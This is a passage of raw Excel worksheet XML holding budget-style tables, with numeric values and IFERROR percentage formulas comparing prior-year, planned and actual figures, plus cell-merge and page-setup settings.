      <c r="F15" s="777">
        <f>IFERROR((D15-B15)/B15*100,"-")</f>
        <v>-39.8678525680458</v>
      </c>
    </row>
    <row r="16" ht="18" customHeight="1" spans="1:6">
      <c r="A16" s="974" t="s">
        <v>558</v>
      </c>
      <c r="B16" s="1022"/>
      <c r="C16" s="1022"/>
      <c r="D16" s="977"/>
      <c r="E16" s="777"/>
      <c r="F16" s="777"/>
    </row>
    <row r="17" ht="18" customHeight="1" spans="1:6">
      <c r="A17" s="974" t="s">
        <v>559</v>
      </c>
      <c r="B17" s="1022"/>
      <c r="C17" s="1022"/>
      <c r="D17" s="977"/>
      <c r="E17" s="777"/>
      <c r="F17" s="777"/>
    </row>
    <row r="18" ht="18" customHeight="1" spans="1:6">
      <c r="A18" s="974" t="s">
        <v>560</v>
      </c>
      <c r="B18" s="839">
        <v>8830</v>
      </c>
      <c r="C18" s="977">
        <v>1205</v>
      </c>
      <c r="D18" s="977">
        <v>6306</v>
      </c>
      <c r="E18" s="777">
        <f>IFERROR(D18/C18*100,"-")</f>
        <v>523.319502074689</v>
      </c>
      <c r="F18" s="777">
        <f>IFERROR((D18-B18)/B18*100,"-")</f>
        <v>-28.5843714609287</v>
      </c>
    </row>
    <row r="19" ht="18" customHeight="1" spans="1:6">
      <c r="A19" s="974" t="s">
        <v>561</v>
      </c>
      <c r="B19" s="839">
        <v>1981</v>
      </c>
      <c r="C19" s="1022"/>
      <c r="D19" s="977">
        <v>2036</v>
      </c>
      <c r="E19" s="777"/>
      <c r="F19" s="777">
        <f>IFERROR((D19-B19)/B19*100,"-")</f>
        <v>2.776375567895</v>
      </c>
    </row>
    <row r="20" ht="18" customHeight="1" spans="1:6">
      <c r="A20" s="974" t="s">
        <v>562</v>
      </c>
      <c r="B20" s="1022"/>
      <c r="C20" s="977"/>
      <c r="D20" s="977"/>
      <c r="E20" s="777"/>
      <c r="F20" s="777"/>
    </row>
    <row r="21" ht="18" customHeight="1" spans="1:6">
      <c r="A21" s="974" t="s">
        <v>563</v>
      </c>
      <c r="B21" s="839">
        <v>33000</v>
      </c>
      <c r="C21" s="977">
        <v>1600</v>
      </c>
      <c r="D21" s="977">
        <v>1600</v>
      </c>
      <c r="E21" s="777">
        <f>IFERROR(D21/C21*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F21" s="777">
        <f>IFERROR((D21-B21)/B21*100,"-")</f>
        <v>-95.1515151515152</v>
      </c>
    </row>
    <row r="22" ht="18" customHeight="1" spans="1:6">
      <c r="A22" s="974" t="s">
        <v>564</v>
      </c>
      <c r="B22" s="1022"/>
      <c r="C22" s="977"/>
      <c r="D22" s="977"/>
      <c r="E22" s="777"/>
      <c r="F22" s="777"/>
    </row>
    <row r="23" ht="18" customHeight="1" spans="1:6">
      <c r="A23" s="974" t="s">
        <v>565</v>
      </c>
      <c r="B23" s="1022"/>
      <c r="C23" s="1022"/>
      <c r="D23" s="977"/>
      <c r="E23" s="777"/>
      <c r="F23" s="777"/>
    </row>
    <row r="24" ht="18" customHeight="1" spans="1:6">
      <c r="A24" s="974" t="s">
        <v>566</v>
      </c>
      <c r="B24" s="1022">
        <v>49900</v>
      </c>
      <c r="C24" s="977">
        <v>70890</v>
      </c>
      <c r="D24" s="977">
        <v>11890</v>
      </c>
      <c r="E24" s="777">
        <f>IFERROR(D24/C24*100,"-")</f>
        <v>16.772464381436</v>
      </c>
      <c r="F24" s="777">
        <f>IFERROR((D24-B24)/B24*100,"-")</f>
        <v>-76.1723446893788</v>
      </c>
    </row>
    <row r="25" ht="18" customHeight="1" spans="1:6">
      <c r="A25" s="983" t="s">
        <v>567</v>
      </c>
      <c r="B25" s="1022"/>
      <c r="C25" s="977">
        <v>150</v>
      </c>
      <c r="D25" s="977">
        <v>150</v>
      </c>
      <c r="E25" s="777">
        <f>IFERROR(D25/C25*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F25" s="777"/>
    </row>
    <row r="26" ht="18" customHeight="1" spans="1:6">
      <c r="A26" s="974" t="s">
        <v>568</v>
      </c>
      <c r="B26" s="1022">
        <f>B27</f>
        <v>1147</v>
      </c>
      <c r="C26" s="1022">
        <f>C27</f>
        <v>779</v>
      </c>
      <c r="D26" s="1022">
        <f>D27</f>
        <v>1089</v>
      </c>
      <c r="E26" s="777">
        <f>IFERROR(D26/C26*100,"-")</f>
        <v>139.794608472401</v>
      </c>
      <c r="F26" s="777">
        <f>IFERROR((D26-B26)/B26*100,"-")</f>
        <v>-5.0566695727986</v>
      </c>
    </row>
    <row r="27" ht="18" customHeight="1" spans="1:6">
      <c r="A27" s="983" t="s">
        <v>569</v>
      </c>
      <c r="B27" s="1022">
        <v>1147</v>
      </c>
      <c r="C27" s="977">
        <v>779</v>
      </c>
      <c r="D27" s="977">
        <v>1089</v>
      </c>
      <c r="E27" s="777">
        <f>IFERROR(D27/C27*100,"-")</f>
        <v>139.794608472401</v>
      </c>
      <c r="F27" s="777">
        <f>IFERROR((D27-B27)/B27*100,"-")</f>
        <v>-5.0566695727986</v>
      </c>
    </row>
    <row r="28" ht="18" customHeight="1" spans="1:6">
      <c r="A28" s="974" t="s">
        <v>570</v>
      </c>
      <c r="B28" s="1022">
        <f>SUM(B29:B35)</f>
        <v>12</v>
      </c>
      <c r="C28" s="1022"/>
      <c r="D28" s="1022"/>
      <c r="E28" s="777"/>
      <c r="F28" s="777">
        <f>IFERROR((D28-B28)/B28*100,"-")</f>
        <v>-100</v>
      </c>
    </row>
    <row r="29" ht="18" customHeight="1" spans="1:6">
      <c r="A29" s="974" t="s">
        <v>571</v>
      </c>
      <c r="B29" s="1022"/>
      <c r="C29" s="977"/>
      <c r="D29" s="977"/>
      <c r="E29" s="777"/>
      <c r="F29" s="777"/>
    </row>
    <row r="30" ht="18" customHeight="1" spans="1:6">
      <c r="A30" s="974" t="s">
        <v>572</v>
      </c>
      <c r="B30" s="1022"/>
      <c r="C30" s="977"/>
      <c r="D30" s="977"/>
      <c r="E30" s="777"/>
      <c r="F30" s="777"/>
    </row>
    <row r="31" ht="18" customHeight="1" spans="1:6">
      <c r="A31" s="974" t="s">
        <v>573</v>
      </c>
      <c r="B31" s="1022"/>
      <c r="C31" s="977"/>
      <c r="D31" s="977"/>
      <c r="E31" s="777"/>
      <c r="F31" s="777"/>
    </row>
    <row r="32" ht="18" customHeight="1" spans="1:6">
      <c r="A32" s="974" t="s">
        <v>574</v>
      </c>
      <c r="B32" s="1022"/>
      <c r="C32" s="977"/>
      <c r="D32" s="977"/>
      <c r="E32" s="777"/>
      <c r="F32" s="777"/>
    </row>
    <row r="33" ht="18" customHeight="1" spans="1:6">
      <c r="A33" s="974" t="s">
        <v>575</v>
      </c>
      <c r="B33" s="1022"/>
      <c r="C33" s="977"/>
      <c r="D33" s="977"/>
      <c r="E33" s="777"/>
      <c r="F33" s="777"/>
    </row>
    <row r="34" ht="18" customHeight="1" spans="1:6">
      <c r="A34" s="974" t="s">
        <v>576</v>
      </c>
      <c r="B34" s="1022">
        <v>12</v>
      </c>
      <c r="C34" s="977"/>
      <c r="D34" s="977"/>
      <c r="E34" s="777"/>
      <c r="F34" s="777">
        <f>IFERROR((D34-B34)/B34*100,"-")</f>
        <v>-100</v>
      </c>
    </row>
    <row r="35" ht="18" customHeight="1" spans="1:6">
      <c r="A35" s="974" t="s">
        <v>577</v>
      </c>
      <c r="B35" s="1022"/>
      <c r="C35" s="977"/>
      <c r="D35" s="977"/>
      <c r="E35" s="777"/>
      <c r="F35" s="777"/>
    </row>
    <row r="36" ht="18" customHeight="1" spans="1:6">
      <c r="A36" s="974" t="s">
        <v>578</v>
      </c>
      <c r="B36" s="1022">
        <f>B37</f>
        <v>500</v>
      </c>
      <c r="C36" s="1022">
        <f>C37</f>
        <v>1914</v>
      </c>
      <c r="D36" s="1022">
        <f>D37</f>
        <v>2913</v>
      </c>
      <c r="E36" s="777">
        <f t="shared" ref="E34:E37" si="0">IFERROR(D36/C36*100,"-")</f>
        <v>152.194357366771</v>
      </c>
      <c r="F36" s="777">
        <f>IFERROR((D36-B36)/B36*100,"-")</f>
        <v>482.6</v>
      </c>
    </row>
    <row r="37" ht="18" customHeight="1" spans="1:6">
      <c r="A37" s="983" t="s">
        <v>567</v>
      </c>
      <c r="B37" s="1022">
        <v>500</v>
      </c>
      <c r="C37" s="977">
        <v>1914</v>
      </c>
      <c r="D37" s="977">
        <v>2913</v>
      </c>
      <c r="E37" s="777">
        <f t="shared" si="0"/>
        <v>152.194357366771</v>
      </c>
      <c r="F37" s="777">
        <f>IFERROR((D37-B37)/B37*100,"-")</f>
        <v>482.6</v>
      </c>
    </row>
    <row r="38" ht="18" customHeight="1" spans="1:6">
      <c r="A38" s="974" t="s">
        <v>579</v>
      </c>
      <c r="B38" s="977">
        <f>SUM(B39:B41)</f>
        <v>84912</v>
      </c>
      <c r="C38" s="977">
        <f>SUM(C39:C41)</f>
        <v>73356</v>
      </c>
      <c r="D38" s="977">
        <f>SUM(D39:D41)</f>
        <v>73473</v>
      </c>
      <c r="E38" s="777">
        <f t="shared" ref="E38:E42" si="1">IFERROR(D38/C38*100,"-")</f>
        <v>100.159496155734</v>
      </c>
      <c r="F38" s="777">
        <f t="shared" ref="F38:F42" si="2">IFERROR((D38-B38)/B38*100,"-")</f>
        <v>-13.4715941209723</v>
      </c>
    </row>
    <row r="39" ht="18" customHeight="1" spans="1:6">
      <c r="A39" s="974" t="s">
        <v>580</v>
      </c>
      <c r="B39" s="731">
        <v>82700</v>
      </c>
      <c r="C39" s="977">
        <v>71420</v>
      </c>
      <c r="D39" s="977">
        <v>71420</v>
      </c>
      <c r="E39" s="777">
        <f t="shared" si="1"/>
        <v>100</v>
      </c>
      <c r="F39" s="777">
        <f t="shared" si="2"/>
        <v>-13.639661426844</v>
      </c>
    </row>
    <row r="40" ht="18" customHeight="1" spans="1:6">
      <c r="A40" s="974" t="s">
        <v>581</v>
      </c>
      <c r="B40" s="839"/>
      <c r="C40" s="977"/>
      <c r="D40" s="977"/>
      <c r="E40" s="777"/>
      <c r="F40" s="777"/>
    </row>
    <row r="41" ht="18" customHeight="1" spans="1:6">
      <c r="A41" s="974" t="s">
        <v>582</v>
      </c>
      <c r="B41" s="839">
        <v>2212</v>
      </c>
      <c r="C41" s="977">
        <v>1936</v>
      </c>
      <c r="D41" s="977">
        <v>2053</v>
      </c>
      <c r="E41" s="777">
        <f t="shared" si="1"/>
        <v>106.043388429752</v>
      </c>
      <c r="F41" s="777">
        <f t="shared" si="2"/>
        <v>-7.18806509945751</v>
      </c>
    </row>
    <row r="42" ht="18" customHeight="1" spans="1:6">
      <c r="A42" s="974" t="s">
        <v>583</v>
      </c>
      <c r="B42" s="839">
        <v>18848</v>
      </c>
      <c r="C42" s="977">
        <v>23695</v>
      </c>
      <c r="D42" s="977">
        <v>23695</v>
      </c>
      <c r="E42" s="777">
        <f t="shared" si="1"/>
        <v>100</v>
      </c>
      <c r="F42" s="777">
        <f t="shared" si="2"/>
        <v>25.7162563667233</v>
      </c>
    </row>
    <row r="43" ht="18" customHeight="1" spans="1:6">
      <c r="A43" s="974" t="s">
        <v>584</v>
      </c>
      <c r="B43" s="1022"/>
      <c r="C43" s="977"/>
      <c r="D43" s="977"/>
      <c r="E43" s="777"/>
      <c r="F43" s="777"/>
    </row>
    <row r="44" ht="18" customHeight="1" spans="1:6">
      <c r="A44" s="974" t="s">
        <v>585</v>
      </c>
      <c r="B44" s="1022"/>
      <c r="C44" s="977"/>
      <c r="D44" s="977"/>
      <c r="E44" s="777"/>
      <c r="F44" s="777"/>
    </row>
    <row r="45" ht="18" customHeight="1" spans="1:6">
      <c r="A45" s="981" t="s">
        <v>586</v>
      </c>
      <c r="B45" s="1024">
        <f>SUM(B6,B7,,B11,B14,B26,B28,B36,B38,B42,B43,B44)</f>
        <v>337309</v>
      </c>
      <c r="C45" s="1024">
        <f>SUM(C6,C7,,C11,C14,C26,C28,C36,C38,C42,C43,C44)</f>
        <v>243817</v>
      </c>
      <c r="D45" s="1024">
        <f>SUM(D6,D7,,D11,D14,D26,D28,D36,D38,D42,D43,D44)</f>
        <v>206250</v>
      </c>
      <c r="E45" s="1086">
        <f t="shared" ref="E45:E53" si="3">IFERROR(D45/C45*100,"-")</f>
        <v>84.5921326240582</v>
      </c>
      <c r="F45" s="1086">
        <f t="shared" ref="F44:F53" si="4">IFERROR((D45-B45)/B45*100,"-")</f>
        <v>-38.8542849434791</v>
      </c>
    </row>
    <row r="46" ht="18" customHeight="1" spans="1:6">
      <c r="A46" s="974" t="s">
        <v>587</v>
      </c>
      <c r="B46" s="839">
        <f>SUM(B47:B48)</f>
        <v>45800</v>
      </c>
      <c r="C46" s="839"/>
      <c r="D46" s="839">
        <f>SUM(D47:D48)</f>
        <v>59000</v>
      </c>
      <c r="E46" s="777"/>
      <c r="F46" s="777">
        <f t="shared" si="4"/>
        <v>28.82096069869</v>
      </c>
    </row>
    <row r="47" ht="18" customHeight="1" spans="1:6">
      <c r="A47" s="974" t="s">
        <v>588</v>
      </c>
      <c r="B47" s="839">
        <v>4630</v>
      </c>
      <c r="C47" s="977"/>
      <c r="D47" s="1022"/>
      <c r="E47" s="777"/>
      <c r="F47" s="777">
        <f t="shared" si="4"/>
        <v>-100</v>
      </c>
    </row>
    <row r="48" ht="18" customHeight="1" spans="1:6">
      <c r="A48" s="974" t="s">
        <v>589</v>
      </c>
      <c r="B48" s="839">
        <v>41170</v>
      </c>
      <c r="C48" s="977"/>
      <c r="D48" s="1022">
        <v>59000</v>
      </c>
      <c r="E48" s="777"/>
      <c r="F48" s="777">
        <f t="shared" si="4"/>
        <v>43.3082341510809</v>
      </c>
    </row>
    <row r="49" ht="18" customHeight="1" spans="1:6">
      <c r="A49" s="974" t="s">
        <v>448</v>
      </c>
      <c r="B49" s="839">
        <f>B50+B51+B52</f>
        <v>82471</v>
      </c>
      <c r="C49" s="1022">
        <f>SUM(C50:C52)</f>
        <v>163317</v>
      </c>
      <c r="D49" s="1022">
        <f>SUM(D50:D52)</f>
        <v>152037</v>
      </c>
      <c r="E49" s="777">
        <f t="shared" si="3"/>
        <v>93.0931868697074</v>
      </c>
      <c r="F49" s="777">
        <f t="shared" si="4"/>
        <v>84.3520752749451</v>
      </c>
    </row>
    <row r="50" ht="18" customHeight="1" spans="1:6">
      <c r="A50" s="974" t="s">
        <v>590</v>
      </c>
      <c r="B50" s="839">
        <v>195</v>
      </c>
      <c r="C50" s="977">
        <v>160</v>
      </c>
      <c r="D50" s="1022">
        <v>160</v>
      </c>
      <c r="E50" s="777">
        <f t="shared" si="3"/>
        <v>100</v>
      </c>
      <c r="F50" s="777">
        <f t="shared" si="4"/>
        <v>-17.9487179487179</v>
      </c>
    </row>
    <row r="51" ht="18" customHeight="1" spans="1:6">
      <c r="A51" s="974" t="s">
        <v>591</v>
      </c>
      <c r="B51" s="839">
        <v>13859</v>
      </c>
      <c r="C51" s="977">
        <v>35301</v>
      </c>
      <c r="D51" s="1022">
        <v>25258</v>
      </c>
      <c r="E51" s="777">
        <f t="shared" si="3"/>
        <v>71.5503810090366</v>
      </c>
      <c r="F51" s="777"/>
    </row>
    <row r="52" ht="18" customHeight="1" spans="1:6">
      <c r="A52" s="974" t="s">
        <v>592</v>
      </c>
      <c r="B52" s="839">
        <v>68417</v>
      </c>
      <c r="C52" s="977">
        <v>127856</v>
      </c>
      <c r="D52" s="1022">
        <v>126619</v>
      </c>
      <c r="E52" s="777">
        <f t="shared" si="3"/>
        <v>99.0325053184833</v>
      </c>
      <c r="F52" s="777">
        <f t="shared" si="4"/>
        <v>85.0695002704006</v>
      </c>
    </row>
    <row r="53" ht="18" customHeight="1" spans="1:6">
      <c r="A53" s="1121" t="s">
        <v>454</v>
      </c>
      <c r="B53" s="780">
        <f t="shared" ref="B53:D53" si="5">SUM(B45,B46,B49)</f>
        <v>465580</v>
      </c>
      <c r="C53" s="780">
        <f t="shared" si="5"/>
        <v>407134</v>
      </c>
      <c r="D53" s="984">
        <f t="shared" si="5"/>
        <v>417287</v>
      </c>
      <c r="E53" s="782">
        <f t="shared" si="3"/>
        <v>102.493773548758</v>
      </c>
      <c r="F53" s="782">
        <f t="shared" si="4"/>
        <v>-10.3726534644959</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A2:F2"/>
    <mergeCell ref="D4:F4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation type="whole" operator="between" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="D27 B45:D45 D8:D13 D15:D25 D29:D35 D37:D44">
      <formula1>-10000000000</formula1>
      <formula2>10000000000</formula2>
    </dataValidation>
  </dataValidations>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.708661417322835" right="0.708661417322835" top="0.511805555555556" bottom="0.314583333333333" header="0.31496062992126" footer="0.31496062992126"/>
  <pageSetup paperSize="9" scale="82"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6"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:XEX19"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="6" topLeftCell="B7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="F17" sqref="F17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="45.2777777777778" style="968" customWidth="1"/>
    <col min="2" max="3" width="10.8425925925926" style="968" customWidth="1"/>
    <col min="4" max="6" width="11" style="968" customWidth="1"/>
    <col min="7" max="16371" width="10.2777777777778" style="968"/>
  </cols>
  <sheetData>
    <row r="1" s="968" customFormat="1" ht="18" spans="1:16378">
      <c r="A1" s="858" t="s">
        <v>593</v>
      </c>
      <c r="E1" s="986"/>
      <c r="F1" s="986"/>
      <c r="XER1"/>
      <c r="XES1"/>
      <c r="XET1"/>
      <c r="XEU1"/>
      <c r="XEV1"/>
      <c r="XEW1"/>
      <c r="XEX1"/>
    </row>
    <row r="2" s="968" customFormat="1" ht="26.4" spans="1:16378">
      <c r="A2" s="998" t="s">
        <v>594</v>
      </c>
      <c r="B2" s="998"/>
      <c r="C2" s="998"/>
      <c r="D2" s="998"/>
      <c r="E2" s="998"/>
      <c r="F2" s="998"/>
      <c r="XER2"/>
      <c r="XES2"/>
      <c r="XET2"/>
      <c r="XEU2"/>
      <c r="XEV2"/>
      <c r="XEW2"/>
      <c r="XEX2"/>
    </row>
    <row r="3" s="968" customFormat="1" spans="5:16378">
      <c r="E3" s="986"/>
      <c r="F3" s="1112" t="s">
        <v>547</v>
      </c>
      <c r="XER3"/>
      <c r="XES3"/>
      <c r="XET3"/>
      <c r="XEU3"/>
      <c r="XEV3"/>
      <c r="XEW3"/>
      <c r="XEX3"/>
    </row>
    <row r="4" s="968" customFormat="1" ht="30" customHeight="1" spans="1:16378">
      <c r="A4" s="972" t="s">
        <v>374</v>
      </c>
      <c r="B4" s="987" t="s">
        <v>517</v>
      </c>
      <c r="C4" s="972" t="s">
        <v>518</v>
      </c>
      <c r="D4" s="972" t="s">
        <v>519</v>
      </c>
      <c r="E4" s="972"/>
      <c r="F4" s="972"/>
      <c r="XER4"/>
      <c r="XES4"/>
      <c r="XET4"/>
      <c r="XEU4"/>
      <c r="XEV4"/>
      <c r="XEW4"/>
      <c r="XEX4"/>
    </row>
    <row r="5" s="968" customFormat="1" ht="30" customHeight="1" spans="1:16378">
      <c r="A5" s="1061"/>
      <c r="B5" s="988"/>
      <c r="C5" s="972"/>
      <c r="D5" s="972" t="s">
        <v>378</v>
      </c>
      <c r="E5" s="972" t="s">
        <v>379</v>
      </c>
      <c r="F5" s="972" t="s">
        <v>380</v>
      </c>
      <c r="XER5"/>
      <c r="XES5"/>
      <c r="XET5"/>
      <c r="XEU5"/>
      <c r="XEV5"/>
      <c r="XEW5"/>
      <c r="XEX5"/>
    </row>
    <row r="6" s="968" customFormat="1" ht="24" customHeight="1" spans="1:16378">
      <c r="A6" s="974" t="s">
        <v>595</v>
      </c>
      <c r="B6" s="1022">
        <v>60</v>
      </c>
      <c r="C6" s="1071"/>
      <c r="D6" s="1028"/>
      <c r="E6" s="1065"/>
      <c r="F6" s="777">
        <f t="shared" ref="F6:F8" si="0">IFERROR((D6-B6)/B6*100,"-")</f>
        <v>-100</v>
      </c>
      <c r="XER6"/>
      <c r="XES6"/>
      <c r="XET6"/>
      <c r="XEU6"/>
      <c r="XEV6"/>
      <c r="XEW6"/>
      <c r="XEX6"/>
    </row>
    <row r="7" s="968" customFormat="1" ht="24" customHeight="1" spans="1:16378">
      <c r="A7" s="983" t="s">
        <v>596</v>
      </c>
      <c r="B7" s="979">
        <f>SUM(B8:B9)</f>
        <v>7706</v>
      </c>
      <c r="C7" s="979">
        <f>SUM(C8:C9)</f>
        <v>1770</v>
      </c>
      <c r="D7" s="979">
        <f>SUM(D8:D9)</f>
        <v>1770</v>
      </c>
      <c r="E7" s="1065">
        <f t="shared" ref="E6:E8" si="1">IFERROR(D7/C7*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F7" s="777">
        <f t="shared" si="0"/>
        <v>-77.0308850246561</v>
      </c>
      <c r="XER7"/>
      <c r="XES7"/>
      <c r="XET7"/>
      <c r="XEU7"/>
      <c r="XEV7"/>
      <c r="XEW7"/>
      <c r="XEX7"/>
    </row>
    <row r="8" s="968" customFormat="1" ht="24" customHeight="1" spans="1:16378">
      <c r="A8" s="983" t="s">
        <v>597</v>
      </c>
      <c r="B8" s="977">
        <v>7706</v>
      </c>
      <c r="C8" s="1114">
        <v>1770</v>
      </c>
      <c r="D8" s="977">
        <v>1770</v>
      </c>
      <c r="E8" s="777">
        <f t="shared" si="1"/>
        <v>100</v>
      </c>
      <c r="F8" s="777">
        <f t="shared" si="0"/>
        <v>-77.0308850246561</v>
      </c>
      <c r="XER8"/>
      <c r="XES8"/>
      <c r="XET8"/>
      <c r="XEU8"/>
      <c r="XEV8"/>
      <c r="XEW8"/>
      <c r="XEX8"/>
    </row>
    <row r="9" s="968" customFormat="1" ht="24" customHeight="1" spans="1:16378">
      <c r="A9" s="974" t="s">
        <v>598</v>
      </c>
      <c r="B9" s="977"/>
      <c r="C9" s="1114"/>
      <c r="D9" s="977"/>
      <c r="E9" s="777"/>
      <c r="F9" s="777"/>
      <c r="XER9"/>
      <c r="XES9"/>
      <c r="XET9"/>
      <c r="XEU9"/>
      <c r="XEV9"/>
      <c r="XEW9"/>
      <c r="XEX9"/>
    </row>
    <row r="10" s="968" customFormat="1" ht="24" customHeight="1" spans="1:16378">
      <c r="A10" s="974" t="s">
        <v>599</v>
      </c>
      <c r="B10" s="731"/>
      <c r="C10" s="979"/>
      <c r="D10" s="977"/>
      <c r="E10" s="777"/>
      <c r="F10" s="777"/>
      <c r="XER10"/>
      <c r="XES10"/>
      <c r="XET10"/>
      <c r="XEU10"/>
      <c r="XEV10"/>
      <c r="XEW10"/>
      <c r="XEX10"/>
    </row>
    <row r="11" s="968" customFormat="1" ht="24" customHeight="1" spans="1:16378">
      <c r="A11" s="974" t="s">
        <v>600</v>
      </c>
      <c r="B11" s="731"/>
      <c r="C11" s="1114"/>
      <c r="D11" s="977"/>
      <c r="E11" s="777"/>
      <c r="F11" s="777"/>
      <c r="XER11"/>
      <c r="XES11"/>
      <c r="XET11"/>
      <c r="XEU11"/>
      <c r="XEV11"/>
      <c r="XEW11"/>
      <c r="XEX11"/>
    </row>
    <row r="12" s="968" customFormat="1" ht="24" customHeight="1" spans="1:16378">
      <c r="A12" s="974" t="s">
        <v>601</v>
      </c>
      <c r="B12" s="731"/>
      <c r="C12" s="1114"/>
      <c r="D12" s="977"/>
      <c r="E12" s="777"/>
      <c r="F12" s="777"/>
      <c r="XER12"/>
      <c r="XES12"/>
      <c r="XET12"/>
      <c r="XEU12"/>
      <c r="XEV12"/>
      <c r="XEW12"/>
      <c r="XEX12"/>
    </row>
    <row r="13" s="968" customFormat="1" ht="24" customHeight="1" spans="1:16378">
      <c r="A13" s="974" t="s">
        <v>602</v>
      </c>
      <c r="B13" s="731"/>
      <c r="C13" s="1114"/>
      <c r="D13" s="977"/>
      <c r="E13" s="777"/>
      <c r="F13" s="777"/>
      <c r="XER13"/>
      <c r="XES13"/>
      <c r="XET13"/>
      <c r="XEU13"/>
      <c r="XEV13"/>
      <c r="XEW13"/>
      <c r="XEX13"/>
    </row>
    <row r="14" s="968" customFormat="1" ht="24" customHeight="1" spans="1:16378">
      <c r="A14" s="974" t="s">
        <v>603</v>
      </c>
      <c r="B14" s="731"/>
      <c r="C14" s="1114">
        <v>10000</v>
      </c>
      <c r="D14" s="977">
        <v>10000</v>
      </c>
      <c r="E14" s="777">
        <f>IFERROR(D14/C14*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F14" s="777"/>
      <c r="XER14"/>
      <c r="XES14"/>
      <c r="XET14"/>
      <c r="XEU14"/>
      <c r="XEV14"/>
      <c r="XEW14"/>
      <c r="XEX14"/>
    </row>
    <row r="15" s="968" customFormat="1" ht="24" customHeight="1" spans="1:16378">
      <c r="A15" s="980" t="s">
        <v>405</v>
      </c>
      <c r="B15" s="980">
        <f>SUM(B6,B7,B10,B13,B14)</f>
        <v>7766</v>
      </c>
      <c r="C15" s="980">
        <f>SUM(C6,C7,C10,C13,C14)</f>
        <v>11770</v>
      </c>
      <c r="D15" s="980">
        <f>SUM(D6,D7,D10,D13,D14)</f>
        <v>11770</v>
      </c>
      <c r="E15" s="1070">
        <f t="shared" ref="E15:E17" si="2">IFERROR(D15/C15*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F15" s="1086">
        <f>IFERROR((D15-B15)/B15*100,"-")</f>
        <v>51.5580736543909</v>
      </c>
      <c r="XER15"/>
      <c r="XES15"/>
      <c r="XET15"/>
      <c r="XEU15"/>
      <c r="XEV15"/>
      <c r="XEW15"/>
      <c r="XEX15"/>
    </row>
    <row r="16" s="968" customFormat="1" ht="24" customHeight="1" spans="1:16378">
      <c r="A16" s="974" t="s">
        <v>541</v>
      </c>
      <c r="B16" s="731">
        <f>B17+B18</f>
        <v>39</v>
      </c>
      <c r="C16" s="1114">
        <f>SUM(C17:C18)</f>
        <v>39</v>
      </c>
      <c r="D16" s="977">
        <f>SUM(D17:D18)</f>
        <v>39</v>
      </c>
      <c r="E16" s="777">
        <f t="shared" si="2"/>
        <v>100</v>
      </c>
      <c r="F16" s="777">
        <f>IFERROR((D16-B16)/B16*100,"-")</f>
        <v>0</v>
      </c>
      <c r="XER16"/>
      <c r="XES16"/>
      <c r="XET16"/>
      <c r="XEU16"/>
      <c r="XEV16"/>
      <c r="XEW16"/>
      <c r="XEX16"/>
    </row>
    <row r="17" s="968" customFormat="1" ht="24" customHeight="1" spans="1:16378">
      <c r="A17" s="974" t="s">
        <v>604</v>
      </c>
      <c r="B17" s="731">
        <v>39</v>
      </c>
      <c r="C17" s="1114">
        <v>39</v>
      </c>
      <c r="D17" s="977">
        <v>39</v>
      </c>
      <c r="E17" s="777">
        <f t="shared" si="2"/>
        <v>100</v>
      </c>
      <c r="F17" s="777">
        <f>IFERROR((D17-B17)/B17*100,"-")</f>
        <v>0</v>
      </c>
      <c r="XER17"/>
      <c r="XES17"/>
      <c r="XET17"/>
      <c r="XEU17"/>
      <c r="XEV17"/>
      <c r="XEW17"/>
      <c r="XEX17"/>
    </row>
    <row r="18" s="968" customFormat="1" ht="24" customHeight="1" spans="1:16378">
      <c r="A18" s="974" t="s">
        <v>605</v>
      </c>
      <c r="B18" s="731"/>
      <c r="C18" s="1114"/>
      <c r="D18" s="977"/>
      <c r="E18" s="777"/>
      <c r="F18" s="1086"/>
      <c r="XER18"/>
      <c r="XES18"/>
      <c r="XET18"/>
      <c r="XEU18"/>
      <c r="XEV18"/>
      <c r="XEW18"/>
      <c r="XEX18"/>
    </row>
    <row r="19" s="968" customFormat="1" ht="24" customHeight="1" spans="1:16378">
      <c r="A19" s="780" t="s">
        <v>417</v>
      </c>
      <c r="B19" s="984">
        <f>SUM(B15,B16)</f>
        <v>7805</v>
      </c>
      <c r="C19" s="984">
        <f>SUM(C15,C16)</f>
        <v>11809</v>
      </c>
      <c r="D19" s="984">
        <f>SUM(D15,D16)</f>
        <v>11809</v>
      </c>
      <c r="E19" s="782">
        <f>IFERROR(D19/C19*100,"-")</f>
        <v>100</v>
      </c>
      <c r="F19" s="782">
        <f>IFERROR((D19-B19)/B19*100,"-")</f>
        <v>51.3004484304933</v>
      </c>
      <c r="XER19"/>
      <c r="XES19"/>
      <c r="XET19"/>
      <c r="XEU19"/>
      <c r="XEV19"/>
      <c r="XEW19"/>
      <c r="XEX19"/>
    </row>
  </sheetData>
  <mergeCells count="5">
    <mergeCell ref="A2:F2"/>
    <mergeCell ref="D4:F4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
    <mergeCell ref="C4:C5"/>
  </mergeCells>
  <pageMargins left="0.629861111111111" right="0.708661417322835" top="0.748031496062992" bottom="0.748031496062992" header="0.31496062992126" footer="0.31496062992126"/>
  <pageSetup paperSize="9" scale="89" orientation="portrait"/>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6"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:XFD19"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="6" topLeftCell="B7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="F19" sqref="F19"/>
    </sheetView>
  </sheetViews>
